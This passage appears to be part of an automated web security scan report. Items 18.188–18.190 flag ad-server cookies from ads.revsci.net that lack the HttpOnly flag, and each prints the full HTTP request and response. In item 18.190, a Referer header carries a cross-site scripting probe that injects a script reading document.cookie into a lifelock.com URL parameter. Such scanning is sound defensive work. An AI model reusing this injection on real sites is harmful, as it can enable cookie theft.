Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1alXr9BmaqyZcgtsTgox7CLyoprYp1/zjRrRdkE/0saMayW1zRBctP4S6OvfJlCxVYlEdNlLrjQdALUzrVeczrQefVoO0/q0m9kAg9P/oCOMPJZss+pplsORhgl+llLQbNRgD3q9KOBpcmtNX6lYn3MRrKbEUKls9oRIVpNN41zokjpyeOpu6gqvo3XQQqZfYIqU8FuMO8gdpZQmblt2FJeOTh6LlOa3JmcSpGXnfR8D4pf6MREwpe7hIarrRyyzz0habHjklxZ1XVlR/DG0weNS1YxMm9x2oZ1UNBLdkNX4PT6FCycjrd4zNqglqfpk2TgWNd5lDN+8DIW7lXVbaoVt8s6ors/eWQUMRuWz38y1G9mKxjOS4aVRVDXNumTvi1vA9vPCy+OL/abeliEDrdwk/bH2H+VfnDCt5qM6IM35w5jjvb0CtQAF49dJD1B78SKhj8NZFUEceldIHW1o43LFMREEtdGdU90PBoMciEgFpt73X0YO9owc/Gf6Ybh0e9KOQIpROavaaHG1xRkxBMRWK82gXGVoiDNSWEXfh2feZwTlqYAO1NP8EFG/8o6nYPShAtISuCD/sLRpU7ynslfUlvcrwLUhc29zCm+FmNDC4/CHKZvIaauG6jQi6P4eQxPIlrbxV8nrdmkimQWspCOlUuRke9tNnBKWg7YKJAG49/WwOyeuOy11+t7EhGsHDmiid4U8l8NHpyhFONeseVrYlzb6X6QnmdO1P3SsAbInuT8dis2BAk1DVSkb7DKlu9G+vY+nyAkjRmbZkDHtTawKZh/5ALg+hCpgBDeS/89vWYqZ5GmmYwQI8hT9D38W2XNZKe9mPQODMvs8Kkrz08wXBsKtINlzl0rWjyHHVAKU3MmBA9uXkHr0oaOZeR6Dx2oA5IkP04PsI2ZIwqMoK7cq7R8O/OSyl5f9H5hCIC7WsLNH3zNIiKaJPtKT2PmGwK98+pqZUlAvV+qM/rOlA9gJjRwmfK0Q+ErGz+L2RINP2PSq3jFAEfi48HBFpLE1To"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 12:34:33 GMT


18.188. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/how-it-works/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; rsi_us_1000000="pUMdJD9HMAYU1E2EPnsIIDz/BtZLv2rR/V4c7O6C3v7m/kxmFYk/sE+g72Wvze9j97z84DKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9svj69842Hfo95KEGQpbMeW+0NaNhmBYTXTkRQKS1XMUccblUZCb8d1ioTrWzOZ45+knAG4/fSC2XVCuSI3SfynIhw/0lJepQCzIltDUGLYzLUkLv/MFxI8xXEt5FPdByafvFHnwcc+g50hOTbL+g7n64N54Np8vbYE35aYyaJiGjpBaC12VhkZlzFtMxirRDAwPWID4NdT8+H1n+vIDBsAcC4v6vpxRHAQWP/wFECr4Zl33i7snI0unkbnfWDKcc2lBdCDsvleyPGu7IGOFhOgsC4wPBBfAj1GcROo+BilbXokC4Pz9vadLAfzLPlIdm0h4ILB9XSlyVc4b6FJRKQ8GSIuCUsCUIuhiY7qOe4dxMbmgcF8Z5vsbPVtNU5unXYkl1MhFPAXo6dObcC7t2Mp4lHB3smqaDjmSWTHYhcyvCsdckm7oUK5b0m3OWakUES9n6/gVIYIYYx4Q8OEV/NJVzUMJ3P0YTcfNkdzUeqj3w7I6vhwmxCxO1HK1RTc4UB35R4M3XJY0QrizGyoGlm9y6oPqyNcDNzYKTvC6oJGklEo2V4PXXhd5rDMHIhx2MXWu4IK+b30e7OfPWDWKlQbvGkOch0VHJWX9SvL5QvXWojkDL40JInzmAVr4XQyDFi7ty6xaQdTP7HzqDar+jK2lgMToKlZIkWUobdESNbO5VUYuF6zbZ/f7YfwXtEOZYHnlawNXis8+0xTL3web3W3GLT/ZTAh4qtrkjAQnd3V8EdMPIYePwpRv8DD3B2L4a6XH5lygIq/vjuHhcNjMMUQ+X+fLAOHHNWjDM+52IKUhADIXMSqGCsUEAyiBu5V+I6rJBxrv9bh4sTdGrxy8QWKFJQU2vB09tMV34No6/mhl+STAB+L7fmkFhELkBHvTZutKd7KYQ1aPWbdRmJfIrHLhmsKllabrGbl63"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:50 GMT


18.189. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/services/command-center/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_rTXK="MLsXr98vcS5joAD3cWnDV5Aua+GKE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5guhIsBNoGV5JHQRTMd9I/6PS5OftgRmlbDwxFXRsomko1dhpOEfNP9Muq5AZfpJg4Ialti6k4Dap9lqBggAx3WL73+UqHqWE9mqgfVjR95nS6LtBhwKfHpSuWuuicmA3XLrG/+6SmU7XfZ3vRJvMOZscGw9+k14L5j+8HB8G/lNCz0tdz1Tc2vQUbdF6KzgbPJFbAeIsZqz9k5fJFuQpYQFji9Nz3OiNrFoynbIaswV9vt49UKLLPZepEQ/oN+mzl/1Qh0LAZ/ymTn6+IQ1Z099Mr8aFo0hS2iVvUixSTrzNVqt5+6nSiH5x/g0FykecCVC5C26vNIYO87EqYCvAOGWCp+z9/cD"; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuqPsoHNTKphYQFnPZZ6K6EmD5csMFqYHuR6kssnr32rGXD1/HupVXWj3FnXNhNKx385FE+blCo9h6K2ZP3Hu+3ByLXWPs4lKKr99i9YEuaRJHu63Y2PLltmJKaU0LBa5ofudUG4PKx7n1tMDqJs/gIOZ05+kGAG4//SC2XXDt6JEif6nIhw32lBerUCjItd7WHHZDbclLp/uH5UOtIu3TewtbbOOnnuABSQ/Q4XqMAvkl2EKpcwDDIlrbHvQx/Yvp6nhMfRB5qBXv4sVXRaZ1KJArFW213BRhS34OwH2mfaApA3Qb5TJvGMgd6EqK6Ldf4VnUw1M7h8rO3XtGL68uaGno0jD0eE1iyT9nFMEZ8PwyUkfYzOS8NZ4GoHBxKTsjC19McaTaIGgqSYj9v6Aq8CgpFKl09bJApW6xjJ224quZ0J2YqQby0rE21OITA80PxvfxQ6+QE6SdR2nr9yhS3MyaPTemAm289zv4oDTlD5CNIG0rMwmxJc8wbakCGy6Evw2blZVaFs3q20wjErqx67u5JPJk1/0kVkz+0TrWgXyJH97VEkkZ3H1S+/bYYOZRrLfL5mn7GuGBwoY9E7sZGJK6B1CGPsNQPz1GHGUP5en5uUEG4t4s8X23sZk3F/rWjj0emnBiQzwHqKPBeEWMnju9ePDzvUnBhyJzmeeGHErqDYRfVR/cw+aIvtHtSLiK9T5jCISpw2ZmPRuIY7fsXKu7dGUEIoaDQ7NUmr2tLMutwK53A14zDFK9jpk6oprO1UKUlOJQfeC1gyKFx3HjnyL72YdLKu5S2CO5hG5K92gw/n+dpEd9+C3U3C7TZiYZfxzvojv+w9d3GOAElMGZNwgahP4blgIwxx8IheXpfGUEMep2VOdKu9RegSfcjtr+7rP1c17TTveQnGtevdGJ3whU1K+lg4KBqFzGPqr9o3C+X4EPt/CLWQMtIgxE2S/pa4P9ZPGzU4tUs+9stKY78YNhFy576M3X8h6JP1//jZP6OY3mhuzK3mi8j5BulBJA="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rTXK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_rTXK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_EoqX="MLsXr98vcS5joAD3cWkzV5Aua/WKE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AV4xn3Ezzk01D1bf4NsCWD94zVmrj/Mmt7b9B9HBn8KpH5maLzmo/IEYGm7ZsUglwRUBJy53sFbNoM9v0dYKqmLcxmZUpSV2jXdqo2+sQis8XoJkd9bGL1Sf/P155HIav7B26tZJqWmmArqjGJZ4EN75CrDUkT4+Hzl5viyGLHP1bWxknuo8ffl6vFjB/I0L1Jta/0sFxWww40YOpjHTNlsY4AmpmiDxP1KfB4UPjRwpkqxQ7FuRkQ0IXos2FCqYjjGV/v0vkYip5GCwMoLIpuF3tZ7JrLmASkRF/Tj96Mlc98m7IbcePPnDUTURTPCTfvl2X7FBSBnd/njU//SLMDdm5PSWNnyF817Mxv3aw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3oDVhT7j6GKTTeto2o206rx7XdHqk2MHqYoAOiWvx6cDR9HtHH40iVodTNtchSGk4X4xYR9YkhuBWSS5ZdvnSD6nym9a9EOO6FFfbKJMGot66KlgRINQareOVAA47DpDddVt41B/2lZDvlXfqypOFT8raL2+bRtNAthCPn7y62D/SpWdGxcRtq0SVasH3UxYhUIek2hg478hSRFiTnVyczF8qo6YikvzdA6TiGQYZ79FgzYWeKcI6cQq1dkqCz30F/6yYHyex3fBPbsyL/rZyGV6GBRXQBOf3/21g2CTgc7qaCM3gBaqKgs2ryD3D0JvXmMlGWhpSwxXTrHW7dJdSHaH16bpTamtxgx9+wKGkZ6IozLj+CEo4RD6bN13y9aIHm/p3JKbYRAPA47P6Am/CQ5c8o0I+kyCB4vioS7Bv20tik0mfbYDUmUPok+b1a3Nt8sII13wWOUTSC3znPlA3RNl9BghF1FL7AEJ2ZE6MLJb8R6Ojt6pNENLP0GFYiwm4TFb2SKn/BmuPGH+RQ53Pf3GEKvM6HCcOInSycBShfBaMhcA6/LnvU1yqcAH2V/YfzHzjJwi8w6C91pBJA5QgXszDumhol06Ym+pxvfckQLm5gctQ7Ktka5eEWJCMtJuKSkgr3s6Bo2QJ9auFyD0kQdK2LM0JC3JQufU9327VyPA6dfQvCZAlM5/Afr3eWtgPtDeb2T01bWnfngDV5H/I6mmkzMuQtNQsRIKedDlX1G54uT577Y09xNC9XEUPAS6L7ChVa61+qfp/YKZa9KAHZjJXL9CvGBkwezmdjPbOLlC0lGDb1816hJChMWzSe4j92z4xvogjhA9vRU9f9UAjWnb+iNhP/VDoBsjWvh5/1m928ePZV2ML3+BjNrt1HgJBCaCU3tHXiQJc2q8DAT4Eh6R5AsRQ6lXG7rHc8JX9ATBuaDtmPphjkJZcTFmkKN+8gcCT+Dll4YbeDx8ko2f7KItXy97q+0SzY2/IvY3ZP6EMEBRtPr2vERSZGNfXg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:53:41 GMT


18.190. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT7e556%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7f71559fd29&c3metrics=adcon
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_J2oN="MLsXr98vcS5joAD3cWnZ721d3dwfAkc/Tt19ScOXuJhsJj1VICFOTaSsJz+o5AVFSd5d5nukIsBNoGXZdCBjO15pPM6fr8NPSbzITptnkS5XSzX1VqnnMPH+QuW+krT+lyL6llVLfSIBFwhYT8pyv7GyjPjKk5AxwnYU9QICR9Wxo6vBHRwRP3tutfdmXfWDDdtOQGmErgzBerB861ViE+7n4hEyL20zETu3OdoXssCZbkxqLWdiKWf6YDUIvUV4CFfQqtBnBt6djprdkXpj4SoMDwnaC+EnhqFUI0RpzTXbKArslQ0oUX7WoAF4Af3zBghd3WHUeFyuhe+UsvFEEHLd8HQmwuTF+jVgdKlfNvV/pC/IIne8MRwVX0AjUXIHY7Pn5El1xoGGG9dXzLmfjZTb3T6zuw9kpPa1"; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHteb7J7RYdxLy/lJT87u7mVRnNRJQoSEiKXEwhQFpkUH9FP70YBJUyeMsKokupCpkNAqGBWeD2WM/bk7l5xd25e0y+ix1bWUfqFPMt4Ra0+I8MJVwuG0bf9vn4fQdGiwg6WnLAVuwjfo+LLc6FOjcF1pARpPpVf1t8GJcgXgZqGD4mfomxrl4raqFlvmpW3mCZn0JtNgr+yM6Eh/JTRJyDe0oCowgeBBAG6+Xf6gDVS2RPzWVHYpGlYl3PyandpWIaymu3gGgKwA1yXTI6v4Nkd6tas2NYti133B2rA5s6l7gLqJkoZXHPSqWmzw9ONeIQllr9jPz8ggWi/S3JmIsYeVk5IfQ2wlpR9gVd2TFYgsI9s+RZ20e0XDMaGcg3JqM/wuDmn+Wub0A/AvcCtN+EgNvtMWW3y84nOqAAnEa6tEXs6cNZjpO7StgJpoDpkVKZVGLKfEh9jQ9l6nSzsx6DyjuvkxCgsa46ly6asrbWe+oydY8ZrVEY72hYeXDSU2aNEVlxRAtYO/++w9EP+ePXijRqY7biGhjDgmgbaO2GNbiffH3K0XXFC4ivqazqa0mYAxHwEkyDTcuZUkjuS0U4swGvTPnSRQ8ctMguTsP3MXkhBBle0SWqyNObxw6BSJHcAEva8Aywxo7Im7hG3C//7xvHLuvweTAEAtq1RGzg2PCmuu8Y6